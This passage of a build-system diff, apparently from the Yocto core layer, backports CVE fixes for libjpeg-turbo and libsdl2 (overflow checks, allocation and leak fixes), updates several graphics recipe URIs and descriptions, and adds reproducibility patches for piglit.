48diff --git a/jdapistd.c b/jdapistd.c
49index 628626254..eb577928c 100644
50--- a/jdapistd.c
51+++ b/jdapistd.c
52@@ -4,7 +4,7 @@
53 * This file was part of the Independent JPEG Group's software:
54 * Copyright (C) 1994-1996, Thomas G. Lane.
55 * libjpeg-turbo Modifications:
56- * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
57+ * Copyright (C) 2010, 2015-2018, 2020, 2023, D. R. Commander.
58 * Copyright (C) 2015, Google, Inc.
59 * For conditions of distribution and use, see the accompanying README.ijg
60 * file.
61@@ -225,9 +225,11 @@ jpeg_crop_scanline(j_decompress_ptr cinfo, JDIMENSION *xoffset,
62 /* Set downsampled_width to the new output width. */
63 orig_downsampled_width = compptr->downsampled_width;
64 compptr->downsampled_width =
65- (JDIMENSION)jdiv_round_up((long)(cinfo->output_width *
66- compptr->h_samp_factor),
67- (long)cinfo->max_h_samp_factor);
68+ (JDIMENSION)jdiv_round_up((long)cinfo->output_width *
69+ (long)(compptr->h_samp_factor *
70+ compptr->_DCT_scaled_size),
71+ (long)(cinfo->max_h_samp_factor *
72+ cinfo->_min_DCT_scaled_size));
73 if (compptr->downsampled_width < 2 && orig_downsampled_width >= 2)
74 reinit_upsampler = TRUE;
75
diff --git a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
index 3005a8a789..fda425c219 100644
--- a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
+++ b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
@@ -13,6 +13,11 @@ DEPENDS_append_x86_class-target = " nasm-native"
13SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz \ 13SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz \
14 file://0001-libjpeg-turbo-fix-package_qa-error.patch \ 14 file://0001-libjpeg-turbo-fix-package_qa-error.patch \
15 file://CVE-2020-13790.patch \ 15 file://CVE-2020-13790.patch \
16 file://CVE-2021-46822.patch \
17 file://CVE-2020-35538-1.patch \
18 file://CVE-2020-35538-2.patch \
19 file://CVE-2023-2804-1.patch \
20 file://CVE-2023-2804-2.patch \
16 " 21 "
17 22
18SRC_URI[md5sum] = "d01d9e0c28c27bc0de9f4e2e8ff49855" 23SRC_URI[md5sum] = "d01d9e0c28c27bc0de9f4e2e8ff49855"
diff --git a/meta/recipes-graphics/kmscube/kmscube_git.bb b/meta/recipes-graphics/kmscube/kmscube_git.bb
index a1a295f660..0aae6df357 100644
--- a/meta/recipes-graphics/kmscube/kmscube_git.bb
+++ b/meta/recipes-graphics/kmscube/kmscube_git.bb
@@ -1,4 +1,8 @@
1DESCRIPTION = "Demo application to showcase 3D graphics using kms and gbm" 1SUMMARY = "Demo application to showcase 3D graphics using kms and gbm"
2DESCRIPTION = "kmscube is a little demonstration program for how to drive bare metal graphics \
3without a compositor like X11, wayland or similar, using DRM/KMS (kernel mode \
4setting), GBM (graphics buffer manager) and EGL for rendering content using \
5OpenGL or OpenGL ES."
2HOMEPAGE = "https://cgit.freedesktop.org/mesa/kmscube/" 6HOMEPAGE = "https://cgit.freedesktop.org/mesa/kmscube/"
3LICENSE = "MIT" 7LICENSE = "MIT"
4SECTION = "graphics" 8SECTION = "graphics"
diff --git a/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
index ab6f5ac9ed..33ea6fe5a9 100644
--- a/meta/recipes-graphics/libfakekey/libfakekey_git.bb
+++ b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
@@ -13,7 +13,7 @@ SECTION = "x11/wm"
13SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40" 13SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40"
14PV = "0.3+git${SRCPV}" 14PV = "0.3+git${SRCPV}"
15 15
16SRC_URI = "git://git.yoctoproject.org/${BPN}" 16SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
17 17
18S = "${WORKDIR}/git" 18S = "${WORKDIR}/git"
19 19
diff --git a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
index 1a31677978..06bd682823 100644
--- a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
+++ b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
@@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext"
17 17
18#SRCREV for 1.12 18#SRCREV for 1.12
19SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87" 19SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87"
20SRC_URI = "git://git.yoctoproject.org/${BPN}" 20SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
21 21
22S = "${WORKDIR}/git" 22S = "${WORKDIR}/git"
23 23
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
new file mode 100644
index 0000000000..d8fa24bc65
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
@@ -0,0 +1,79 @@
1From a7ff6e96155f550a5597621ebeddd03c98aa9294 Mon Sep 17 00:00:00 2001
2From: Sam Lantinga <slouken@libsdl.org>
3Date: Wed, 17 Jun 2020 08:44:45 -0700
4Subject: [PATCH] Fixed overflow in surface pitch calculation
5
6
7Upstream-Status: Backport
8[https://github.com/libsdl-org/SDL/commit/a7ff6e96155f550a5597621ebeddd03c98aa9294]
9CVE: CVE-2020-14409 CVE-2020-14410
10Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
11
12---
13 src/video/SDL_surface.c | 23 +++++++++++++++--------
14 1 file changed, 15 insertions(+), 8 deletions(-)
15
16diff --git a/src/video/SDL_surface.c b/src/video/SDL_surface.c
17index 085d9ff1e..bff826f7c 100644
18--- a/src/video/SDL_surface.c
19+++ b/src/video/SDL_surface.c
20@@ -28,24 +28,23 @@
21 #include "SDL_yuv_c.h"
22
23
24-/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow size_t */
25-SDL_COMPILE_TIME_ASSERT(surface_size_assumptions,
26- sizeof(int) == sizeof(Sint32) && sizeof(size_t) >= sizeof(Sint32));
27+/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow Sint64 */
28+SDL_COMPILE_TIME_ASSERT(surface_size_assumptions, sizeof(int) == sizeof(Sint32));
29
30 /* Public routines */
31
32 /*
33 * Calculate the pad-aligned scanline width of a surface
34 */
35-static int
36+static Sint64
37 SDL_CalculatePitch(Uint32 format, int width)
38 {
39- int pitch;
40+ Sint64 pitch;
41
42 if (SDL_ISPIXELFORMAT_FOURCC(format) || SDL_BITSPERPIXEL(format) >= 8) {
43- pitch = (width * SDL_BYTESPERPIXEL(format));
44+ pitch = ((Sint64)width * SDL_BYTESPERPIXEL(format));
45 } else {
46- pitch = ((width * SDL_BITSPERPIXEL(format)) + 7) / 8;
47+ pitch = (((Sint64)width * SDL_BITSPERPIXEL(format)) + 7) / 8;
48 }
49 pitch = (pitch + 3) & ~3; /* 4-byte aligning for speed */
50 return pitch;
51@@ -59,11 +58,19 @@ SDL_Surface *
52 SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
53 Uint32 format)
54 {
55+ Sint64 pitch;
56 SDL_Surface *surface;
57
58 /* The flags are no longer used, make the compiler happy */
59 (void)flags;
60
61+ pitch = SDL_CalculatePitch(format, width);
62+ if (pitch < 0 || pitch > SDL_MAX_SINT32) {
63+ /* Overflow... */
64+ SDL_OutOfMemory();
65+ return NULL;
66+ }
67+
68 /* Allocate the surface */
69 surface = (SDL_Surface *) SDL_calloc(1, sizeof(*surface));
70 if (surface == NULL) {
71@@ -78,7 +85,7 @@ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
72 }
73 surface->w = width;
74 surface->h = height;
75- surface->pitch = SDL_CalculatePitch(format, width);
76+ surface->pitch = (int)pitch;
77 SDL_SetClipRect(surface, NULL);
78
79 if (SDL_ISPIXELFORMAT_INDEXED(surface->format->format)) {
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
new file mode 100644
index 0000000000..a4ed7ab8e6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
@@ -0,0 +1,38 @@
1From 8c91cf7dba5193f5ce12d06db1336515851c9ee9 Mon Sep 17 00:00:00 2001
2From: Sam Lantinga <slouken@libsdl.org>
3Date: Tue, 30 Nov 2021 12:36:46 -0800
4Subject: [PATCH] Always create a full 256-entry map in case color values are
5 out of range
6
7Fixes https://github.com/libsdl-org/SDL/issues/5042
8
9CVE: CVE-2021-33657
10Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/8c91cf7dba5193f5ce12d06db1336515851c9ee9.patch]
11Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
12
13---
14 src/video/SDL_pixels.c | 4 ++--
15 1 file changed, 2 insertions(+), 2 deletions(-)
16
17diff --git a/src/video/SDL_pixels.c b/src/video/SDL_pixels.c
18index ac04533c5d5..9bb02f771d0 100644
19--- a/src/video/SDL_pixels.c
20+++ b/src/video/SDL_pixels.c
21@@ -947,7 +947,7 @@ Map1to1(SDL_Palette * src, SDL_Palette * dst, int *identical)
22 }
23 *identical = 0;
24 }
25- map = (Uint8 *) SDL_malloc(src->ncolors);
26+ map = (Uint8 *) SDL_calloc(256, sizeof(Uint8));
27 if (map == NULL) {
28 SDL_OutOfMemory();
29 return (NULL);
30@@ -971,7 +971,7 @@ Map1toN(SDL_PixelFormat * src, Uint8 Rmod, Uint8 Gmod, Uint8 Bmod, Uint8 Amod,
31 SDL_Palette *pal = src->palette;
32
33 bpp = ((dst->BytesPerPixel == 3) ? 4 : dst->BytesPerPixel);
34- map = (Uint8 *) SDL_malloc(pal->ncolors * bpp);
35+ map = (Uint8 *) SDL_calloc(256, bpp);
36 if (map == NULL) {
37 SDL_OutOfMemory();
38 return (NULL);
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
new file mode 100644
index 0000000000..b02a2169a6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
@@ -0,0 +1,38 @@
1From 00b67f55727bc0944c3266e2b875440da132ce4b Mon Sep 17 00:00:00 2001
2From: zhailiangliang <zhailiangliang@loongson.cn>
3Date: Wed, 21 Sep 2022 10:30:38 +0800
4Subject: [PATCH] Fix potential memory leak in GLES_CreateTexture
5
6
7CVE: CVE-2022-4743
8Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/00b67f55727bc0944c3266e2b875440da132ce4b.patch]
9Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
10
11---
12 src/render/opengles/SDL_render_gles.c | 6 ++++++
13 1 file changed, 6 insertions(+)
14
15diff --git a/src/render/opengles/SDL_render_gles.c b/src/render/opengles/SDL_render_gles.c
16index a5fbab309eda..ba08a46e2805 100644
17--- a/src/render/opengles/SDL_render_gles.c
18+++ b/src/render/opengles/SDL_render_gles.c
19@@ -359,6 +359,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
20 renderdata->glGenTextures(1, &data->texture);
21 result = renderdata->glGetError();
22 if (result != GL_NO_ERROR) {
23+ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
24+ SDL_free(data->pixels);
25+ }
26 SDL_free(data);
27 return GLES_SetError("glGenTextures()", result);
28 }
29@@ -387,6 +390,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
30
31 result = renderdata->glGetError();
32 if (result != GL_NO_ERROR) {
33+ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
34+ SDL_free(data->pixels);
35+ }
36 SDL_free(data);
37 return GLES_SetError("glTexImage2D()", result);
38 }
diff --git a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
index fa7acc4c50..fa29bc99ac 100644
--- a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
+++ b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
@@ -20,6 +20,9 @@ SRC_URI = "http://www.libsdl.org/release/SDL2-${PV}.tar.gz \
20 file://more-gen-depends.patch \ 20 file://more-gen-depends.patch \
21 file://directfb-spurious-curly-brace-missing-e.patch \ 21 file://directfb-spurious-curly-brace-missing-e.patch \
22 file://directfb-renderfillrect-fix.patch \ 22 file://directfb-renderfillrect-fix.patch \
23 file://CVE-2020-14409-14410.patch \
24 file://CVE-2021-33657.patch \
25 file://CVE-2022-4743.patch \
23" 26"
24 27
25S = "${WORKDIR}/SDL2-${PV}" 28S = "${WORKDIR}/SDL2-${PV}"
diff --git a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
index 03b38027a1..f14ed0f52b 100644
--- a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
+++ b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
@@ -14,7 +14,7 @@ SECTION = "x11"
14LICENSE = "MIT" 14LICENSE = "MIT"
15LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e" 15LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e"
16 16
17SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch" 17SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https"
18SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17" 18SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17"
19S = "${WORKDIR}/git" 19S = "${WORKDIR}/git"
20 20
diff --git a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
index a08eb252ce..3ea67d09d6 100644
--- a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
+++ b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex
12 12
13# SRCREV tagged 1.2.2 13# SRCREV tagged 1.2.2
14SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970" 14SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970"
15SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \ 15SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \
16 file://0001-Fix-build-with-gcc-10.patch \ 16 file://0001-Fix-build-with-gcc-10.patch \
17 file://kbdconfig" 17 file://kbdconfig"
18 18
diff --git a/meta/recipes-graphics/mesa/mesa.inc b/meta/recipes-graphics/mesa/mesa.inc
index a1bf878b1a..bfab19e773 100644
--- a/meta/recipes-graphics/mesa/mesa.inc
+++ b/meta/recipes-graphics/mesa/mesa.inc
@@ -231,7 +231,7 @@ python mesa_populate_packages() {
231 import re 231 import re
232 dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri") 232 dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri")
233 if os.path.isdir(dri_drivers_root): 233 if os.path.isdir(dri_drivers_root):
234 dri_pkgs = os.listdir(dri_drivers_root) 234 dri_pkgs = sorted(os.listdir(dri_drivers_root))
235 lib_name = d.expand("${MLPREFIX}mesa-megadriver") 235 lib_name = d.expand("${MLPREFIX}mesa-megadriver")
236 for p in dri_pkgs: 236 for p in dri_pkgs:
237 m = re.match(r'^(.*)_dri\.so$', p) 237 m = re.match(r'^(.*)_dri\.so$', p)
diff --git a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
index 4e89d631c3..549b0cbdf7 100644
--- a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
+++ b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Very simple session manager for X" 1SUMMARY = "Very simple session manager for X"
2DESCRIPTION = "Simple session manager for X, that provides just the right boilerplate to create a session and launch the browser "
2HOMEPAGE = "http://www.yoctoproject.org" 3HOMEPAGE = "http://www.yoctoproject.org"
3BUGTRACKER = "http://bugzilla.pokylinux.org" 4BUGTRACKER = "http://bugzilla.pokylinux.org"
4 5
diff --git a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
index 58a6997ffe..88101b5dcc 100644
--- a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
+++ b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
@@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}"
7# Exclude x.99.x versions from upstream checks 7# Exclude x.99.x versions from upstream checks
8UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)" 8UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)"
9 9
10SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \ 10SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \
11 file://fix-test-includes.patch \ 11 file://fix-test-includes.patch \
12 " 12 "
13S = "${WORKDIR}/git" 13S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/mx/mx.inc b/meta/recipes-graphics/mx/mx.inc
index 714a06f0af..c977849c96 100644
--- a/meta/recipes-graphics/mx/mx.inc
+++ b/meta/recipes-graphics/mx/mx.inc
@@ -1,4 +1,10 @@
1SUMMARY = "Clutter based UI widget library" 1SUMMARY = "Clutter based UI widget library"
2DESCRIPTION = "Mx is a widget toolkit using Clutter that provides a set of standard interface \
3elements, including buttons, progress bars, scroll bars and others. It also \
4implements some standard managers. One other interesting feature is the \
5possibility setting style properties from a CSS format file."
6HOMEPAGE = "https://github.com/clutter-project/mx"
7BUGTRACKER = "https://github.com/clutter-project/mx/issues"
2LICENSE = "LGPLv2.1" 8LICENSE = "LGPLv2.1"
3 9
4inherit clutter autotools features_check gobject-introspection gtk-doc 10inherit clutter autotools features_check gobject-introspection gtk-doc
diff --git a/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
new file mode 100644
index 0000000000..caa48e088d
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
@@ -0,0 +1,27 @@
1From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Sun, 1 Nov 2020 20:08:49 +0000
4Subject: [PATCH] Add a missing include for htobe32 definition
5
6Upstream-Status: Pending
7Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
8---
9 tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++
10 1 file changed, 2 insertions(+)
11
12diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
13index 5f45e0c23..c755ee29a 100644
14--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
15+++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
16@@ -34,6 +34,8 @@
17
18 #include "piglit-util-gl.h"
19
20+#include <endian.h>
21+
22 #define IMAGE_WIDTH 60
23 #define IMAGE_HEIGHT 60
24
25--
262.17.1
27
diff --git a/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
new file mode 100644
index 0000000000..cc9482c047
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
@@ -0,0 +1,31 @@
1From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Mon, 30 Nov 2020 23:08:22 +0000
4Subject: [PATCH] framework/profile.py: make test lists reproducible
5
6These are created with os.walk, which yields different
7order depending on where it's run.
8
9Upstream-Status: Pending
10Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
11---
12 framework/profile.py | 6 +++++-
13 1 file changed, 5 insertions(+), 1 deletion(-)
14
15diff --git a/framework/profile.py b/framework/profile.py
16index c210e535e..9b5d51d68 100644
17--- a/framework/profile.py
18+++ b/framework/profile.py
19@@ -528,7 +528,11 @@ class TestProfile(object):
20 else:
21 opts[n] = self.test_list[n]
22 else:
23- opts = self.test_list # pylint: disable=redefined-variable-type
24+ opts = collections.OrderedDict()
25+ test_keys = list(self.test_list.keys())
26+ test_keys.sort()
27+ for k in test_keys:
28+ opts[k] = self.test_list[k]
29
30 for k, v in self.filters.run(opts.items()):
31 yield k, v
diff --git a/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
new file mode 100644
index 0000000000..8704f98500
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
@@ -0,0 +1,44 @@
1From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Tue, 10 Nov 2020 17:12:32 +0000
4Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not
5 hardcode the full binary path
6
7This helps reproducibility.
8
9Upstream-Status: Pending
10Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
11---
12 generated_tests/gen_tcs_input_tests.py | 2 +-
13 generated_tests/gen_tes_input_tests.py | 2 +-
14 2 files changed, 2 insertions(+), 2 deletions(-)
15
16diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py
17index face4f19a..e36671af4 100644
18--- a/generated_tests/gen_tcs_input_tests.py
19+++ b/generated_tests/gen_tcs_input_tests.py
20@@ -272,7 +272,7 @@ class Test(object):
21 relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
22 """)
23
24- test = test.format(self=self, generator_command=" ".join(sys.argv))
25+ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py")
26
27 filename = self.filename()
28 dirname = os.path.dirname(filename)
29diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py
30index 3d847b5cc..954840b20 100644
31--- a/generated_tests/gen_tes_input_tests.py
32+++ b/generated_tests/gen_tes_input_tests.py
33@@ -301,7 +301,7 @@ class Test(object):
34 relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
35 """)
36
37- test = test.format(self=self, generator_command=" ".join(sys.argv))
38+ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py")
39
40 filename = self.filename()
41 dirname = os.path.dirname(filename)
42--
432.17.1
44
diff --git a/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
new file mode 100644
index 0000000000..2efba6f866
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
@@ -0,0 +1,30 @@
1From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Mon, 16 Nov 2020 18:01:02 +0000
4Subject: [PATCH] serializer.py: make .gz files reproducible
5
6.gz format contains mtime of the compressed data, and
7SOURCE_DATE_EPOCH is the standard way to make it reproducuble.
8
9Upstream-Status: Pending
10Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
11---
12 tests/serializer.py | 5 ++++-
13 1 file changed, 4 insertions(+), 1 deletion(-)
14
15diff --git a/tests/serializer.py b/tests/serializer.py
16index bd14bc3db..bc5b45d7f 100644
17--- a/tests/serializer.py
18+++ b/tests/serializer.py
19@@ -138,7 +138,10 @@ def serializer(name, profile, outfile):
20 et.SubElement(env, 'env', name=k, value=v)
21
22 tree = et.ElementTree(root)
23- with gzip.open(outfile, 'wb') as f:
24+ reproducible_mtime = None
25+ if 'SOURCE_DATE_EPOCH' in os.environ:
26+ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH']
27+ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f:
28 tree.write(f, encoding='utf-8', xml_declaration=True)
29
30
diff --git a/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
new file mode 100644
index 0000000000..8321be8490
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
@@ -0,0 +1,28 @@
1From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Wed, 2 Dec 2020 21:21:52 +0000
4Subject: [PATCH] tests/shader.py: sort the file list before working on it
5
6This allows later xml output to be reproducible.
7
8Upstream-Status: Pending
9Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
10---
11 tests/shader.py | 4 +++-
12 1 file changed, 3 insertions(+), 1 deletion(-)
13
14diff --git a/tests/shader.py b/tests/shader.py
15index 849273660..e6e65d1ba 100644
16--- a/tests/shader.py
17+++ b/tests/shader.py
18@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]:
19 for group, files in shader_tests.items():
20 assert group not in profile.test_list, 'duplicate group: {}'.format(group)
21
22- # We'll end up with a list of tuples, split that into two lists
23+ # This makes the xml output reproducible, as os.walk() order is random
24+ files.sort()
25+ # We'll end up with a list of tuples, split that into two list
26 files, installedfiles = list(zip(*files))
27 files = list(files)
28 installedfiles = list(installedfiles)
diff --git a/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
new file mode 100644
index 0000000000..16c7c5c803
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
@@ -0,0 +1,30 @@
1From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Tue, 10 Nov 2020 17:13:50 +0000
4Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path
5 into target binary
6
7This helps reproducibilty.
8
9Upstream-Status: Inappropriate [oe-core specific]
10Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
11---
12 tests/util/piglit-shader.c | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-)
14
15diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c
16index 4fd68d21e..c9ea8295e 100644
17--- a/tests/util/piglit-shader.c
18+++ b/tests/util/piglit-shader.c
19@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename)
20
21 source_dir = getenv("PIGLIT_SOURCE_DIR");
22 if (source_dir == NULL) {
23- source_dir = SOURCE_DIR;
24+ source_dir = ".";
25 }
26
27 snprintf(filename_with_path, FILENAME_MAX - 1,
28--
292.17.1
30
diff --git a/meta/recipes-graphics/piglit/piglit_git.bb b/meta/recipes-graphics/piglit/piglit_git.bb
index 58d10d6b9b..9897ef1575 100644
--- a/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/meta/recipes-graphics/piglit/piglit_git.bb
@@ -1,16 +1,24 @@
1SUMMARY = "OpenGL driver testing framework" 1SUMMARY = "OpenGL driver testing framework"
2DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \ 2DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \
3implementations." 3implementations."
4HOMEPAGE = "https://gitlab.freedesktop.org/mesa/piglit"
5BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues"
4LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause" 6LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause"
5LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0" 7LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0"
6 8
7SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \ 9SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \
8 file://0001-cmake-install-bash-completions-in-the-right-place.patch \ 10 file://0001-cmake-install-bash-completions-in-the-right-place.patch \
